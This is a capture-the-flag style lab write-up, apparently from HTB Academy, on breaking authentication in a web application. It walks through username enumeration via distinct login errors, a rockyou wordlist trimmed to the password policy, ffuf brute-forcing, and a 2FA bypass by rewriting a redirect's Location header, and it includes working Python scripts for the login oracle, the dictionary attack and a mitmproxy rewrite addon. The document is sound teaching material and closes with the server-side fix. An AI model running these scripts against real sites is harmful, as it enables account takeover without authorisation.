HTB Academy - Broken Auth Lab Assessment
Task: Perform security assessment on the web application and bypass authentication to get the flag

Login page: Identifying the error generated by the application for invalid credentials - 1
I do not have any information about a valid user, so I cannot tell whether the error is generated because of an incorrect username or an incorrect password. Moving on to the register page...
Register page: Register a new test user
While registering, I found the password policy rules the application enforces. These will be useful in later attacks, because they shrink the password search space.
Login Page: Identifying the errors generated by invalid credentials - 2
Now that I have valid credentials, I can determine which errors are generated for an invalid username and for an invalid password.
For a valid username with an invalid password the error is "Invalid credentials.", while for an invalid username it is "Unknown username or password.", as seen earlier. Because the two responses differ, the login page acts as a username oracle, and I can now enumerate valid usernames.
Username Enumeration

With ffuf I brute-forced the login page to find a valid username. I got one real hit. ffuf also reported other usernames, but those were false positives: their responses had size 0 (they can be dropped with ffuf's -fs 0 filter), and I confirmed this by checking them manually. Next, I need to find a valid password for that user.
Password Attack (Dictionary Attack)
Before starting the attack I need a wordlist. I used rockyou.txt, trimmed according to the password policy so that only candidates the application could accept are tried.
Command used to trim the wordlist (it keeps only entries that are exactly 12 characters long, contain at least one digit, one lowercase letter and one uppercase letter, and contain none of the characters ~!@#$%&*):
grep -E '^.{12}$' /usr/share/wordlists/rockyou.txt | grep -E '[0-9]' | grep -E '[a-z]' | grep -E '[A-Z]' | grep -Ev '[~!@#$%&*]' > passwords.txt
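The same trimming in Python, as an added example that is not part of the original write-up. The rules are the ones encoded in the grep pipeline above and are assumed to mirror the application's policy; the sample wordlist is constructed for the demo, and the script also accepts a path (for example to rockyou.txt) on the command line.

```python
import re
import sys

# Rules taken from the grep pipeline (assumed to mirror the lab's policy):
# exactly 12 characters, at least one digit, one lowercase and one uppercase
# letter, and none of the characters ~!@#$%&*.
RULES = (
    re.compile(r"^.{12}$"),
    re.compile(r"[0-9]"),
    re.compile(r"[a-z]"),
    re.compile(r"[A-Z]"),
)
FORBIDDEN = re.compile(r"[~!@#$%&*]")


def matches_policy(candidate: str) -> bool:
    """True when every positive rule matches and no forbidden character is present."""
    return all(rule.search(candidate) for rule in RULES) and not FORBIDDEN.search(candidate)


def filter_wordlist(lines):
    """Yield the wordlist entries that satisfy the policy.

    Only the trailing newline is stripped, so leading or trailing spaces still
    count toward the length, exactly as they do for grep.
    """
    for line in lines:
        word = line.rstrip("\n")
        if matches_policy(word):
            yield word


# Constructed sample wordlist (not taken from rockyou.txt), one entry per rule.
SAMPLE_WORDLIST = [
    "Password1234\n",   # keep: 12 chars, digit, lower, upper, no forbidden char
    "password1234\n",   # drop: no uppercase letter
    "Password123!\n",   # drop: contains a forbidden character
    "Pass1234\n",       # drop: too short
    "SuperSecret1x\n",  # drop: too long
    "Summer2024AB\n",   # keep
    "Hello-World1\n",   # keep: '-' is not in the forbidden set, so grep keeps it too
]


def main(argv):
    """Filter the file given on the command line, or the sample list if none."""
    if len(argv) > 1:
        # rockyou.txt contains bytes that are not valid UTF-8; latin-1 maps every
        # byte to one character, so no line is lost to a decode error.
        with open(argv[1], encoding="latin-1") as fh:
            kept = list(filter_wordlist(fh))
    else:
        kept = list(filter_wordlist(SAMPLE_WORDLIST))
    for word in kept:
        print(word)
    return kept


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 trim.py /usr/share/wordlists/rockyou.txt > passwords.txt` to reproduce the grep output; the sample run shows that only the three conforming entries survive.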
Brute-Forcing the Password with ffuf

I got a hit. Now I have both the username and the password needed to authenticate to the web application. After logging in, another layer of authentication is waiting: a TOTP (Time-based One-Time Password).
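The login oracle behind both the username enumeration and the dictionary attack above, as an added example that is not part of the original write-up. The two error strings are the ones observed on the login page; the URL, the form field names (username, password) and the fake application are assumptions, and the transport is injected so the logic runs offline against that constructed fake before it is pointed at the lab. It also handles the size-0 responses that showed up as ffuf false positives, by reporting them as inconclusive instead of as hits.

```python
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# The two error strings come from the write-up. Everything else about the
# target (URL, form field names, what follows a correct login) is assumed.
UNKNOWN_USER = "Unknown username or password."
WRONG_PASSWORD = "Invalid credentials."
LOGIN_URL = "http://TARGET/login.php"  # assumed placeholder, not the lab's URL


def classify(status, body):
    """Turn one login response into what it says about the submitted pair.

    An empty body (the 'size 0' rows in ffuf's output) carries no information
    and is reported as inconclusive rather than as a hit. A non-empty body
    without either error string is 'other': for a correct password that is
    the page or redirect that follows login, and it deserves a manual look.
    """
    if not body.strip():
        return "inconclusive"
    if UNKNOWN_USER in body:
        return "unknown_user"
    if WRONG_PASSWORD in body:
        return "valid_user"
    return "other"


def http_post(url, fields, timeout=10):
    """Real transport: one form POST, returning (status, body)."""
    req = Request(url, data=urlencode(fields).encode(), method="POST")
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except HTTPError as err:  # 4xx/5xx bodies still carry the error text
        return err.code, err.read().decode(errors="replace")


def enumerate_usernames(send, candidates, dummy_password="x"):
    """Return every candidate the application admits exists.

    `send(fields) -> (status, body)` is the transport, injected so the same
    logic runs against the constructed app below or the real endpoint.
    """
    return [
        name for name in candidates
        if classify(*send({"username": name, "password": dummy_password})) == "valid_user"
    ]


def dictionary_attack(send, username, passwords):
    """Return the first password the application does not reject, else None."""
    for password in passwords:
        if classify(*send({"username": username, "password": password})) == "other":
            return password
    return None


def make_fake_app(valid_username, valid_password):
    """Constructed stand-in for the lab's login endpoint (not the real app).

    It reproduces the two distinguishable errors and, for the name 'ghost',
    the empty body that produced the size-0 false positives in ffuf.
    """
    def send(fields):
        user, password = fields["username"], fields["password"]
        if user == "ghost":
            return 200, ""
        if user != valid_username:
            return 200, f"<p>{UNKNOWN_USER}</p>"
        if password != valid_password:
            return 200, f"<p>{WRONG_PASSWORD}</p>"
        return 302, "<a href='2fa.php'>Continue to 2FA</a>"
    return send


if __name__ == "__main__":
    app = make_fake_app("demo_user", "Summer2024AB")  # constructed credentials
    users = enumerate_usernames(app, ["admin", "ghost", "demo_user", "bob"])
    print("valid usernames:", users)
    print("password:", dictionary_attack(app, users[0], ["Password1234", "Summer2024AB"]))
    # Against the lab: enumerate_usernames(lambda f: http_post(LOGIN_URL, f), names)
```

The ffuf equivalent of `classify` is a filter on the rejecting response: drop "Unknown username or password." responses while fuzzing the username, and drop "Invalid credentials." responses while fuzzing the password; the empty responses are what `-fs 0` removes.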
2FA Bypass - TOTP

Brute-forcing the OTP is a possible attack, but I did not know how many digits it has. I tried 4 digits (10,000 combinations) and then 6 digits, and stopped because a 6-digit OTP has 1,000,000 combinations, which is not feasible.
I analyzed the requests and found that after 3 requests to the 2FA endpoint, the application responds with a redirect to the login page. Since that redirect is only a Location header in the response, it can be tampered with in the proxy to send the browser to the page that opens after successful authentication instead.
I intercepted the response to the 3rd request and changed the Location header to profile.php:

The redirect was successful and I was authenticated into the web app and retrieved the flag. This works because the server already treats the session as logged in before the OTP is verified and profile.php does not check that the second factor was completed; the 2FA enforcement lives only in the client-side redirect, which the client controls.
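An automated version of the manual interception step above, written in the shape of a mitmproxy addon. It is an added example, not part of the lab or the original write-up: the endpoint paths (/2fa.php, login.php) are assumptions, profile.php is the target named above, and the rewrite is kept in a plain function with a constructed flow object so it can be run without mitmproxy.

```python
# Shape of a mitmproxy addon: mitmproxy calls response(flow) for every server
# response when started as `mitmdump -s this_file.py`. The paths below are
# assumptions; use the ones the lab actually serves.
TWO_FA_PATH = "/2fa.php"
LOGIN_PAGE = "login.php"
POST_AUTH_PAGE = "profile.php"


def rewrite_redirect(status_code, headers, login_page=LOGIN_PAGE, target=POST_AUTH_PAGE):
    """Retarget a redirect-to-login at the post-authentication page.

    `headers` is any mapping with get/setitem (a dict or mitmproxy's Headers).
    Only 3xx responses whose Location ends in the login page are changed; the
    prefix of the original Location (scheme, host, directory) is preserved, so
    relative and absolute redirects are both handled. Returns True on a rewrite.
    """
    if not 300 <= status_code < 400:
        return False
    location = headers.get("Location", "")
    last = location.rpartition("/")[2]
    if last != login_page:
        return False
    headers["Location"] = location[: len(location) - len(last)] + target
    return True


def response(flow):
    """mitmproxy response hook: only touches responses from the 2FA endpoint."""
    if not flow.request.path.startswith(TWO_FA_PATH):
        return False
    changed = rewrite_redirect(flow.response.status_code, flow.response.headers)
    if changed:
        print(f"[+] rewrote Location on {flow.request.path} -> {flow.response.headers['Location']}")
    return changed


class _Obj:
    """Minimal attribute bag used to build a constructed flow for the demo."""

    def __init__(self, **attrs):
        self.__dict__.update(attrs)


def make_fake_flow(path, status_code, location):
    """Constructed flow exposing the attributes the hook reads (not a real mitmproxy flow)."""
    return _Obj(request=_Obj(path=path),
                response=_Obj(status_code=status_code, headers={"Location": location}))


if __name__ == "__main__":
    # Third wrong OTP: the app answers 302 -> login.php; send the browser to profile.php.
    flow = make_fake_flow("/2fa.php", 302, "/login.php")
    response(flow)
    print(flow.response.headers)
```

The hook deliberately leaves every response that is not a 3xx pointing at the login page untouched, so the first two OTP attempts and the rest of the application pass through unchanged. The server-side fix is the mirror image: keep a "2FA pending" marker in the session and have profile.php (and every other post-login page) refuse to serve until that marker is cleared, so the Location header no longer decides whether the second factor was passed.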
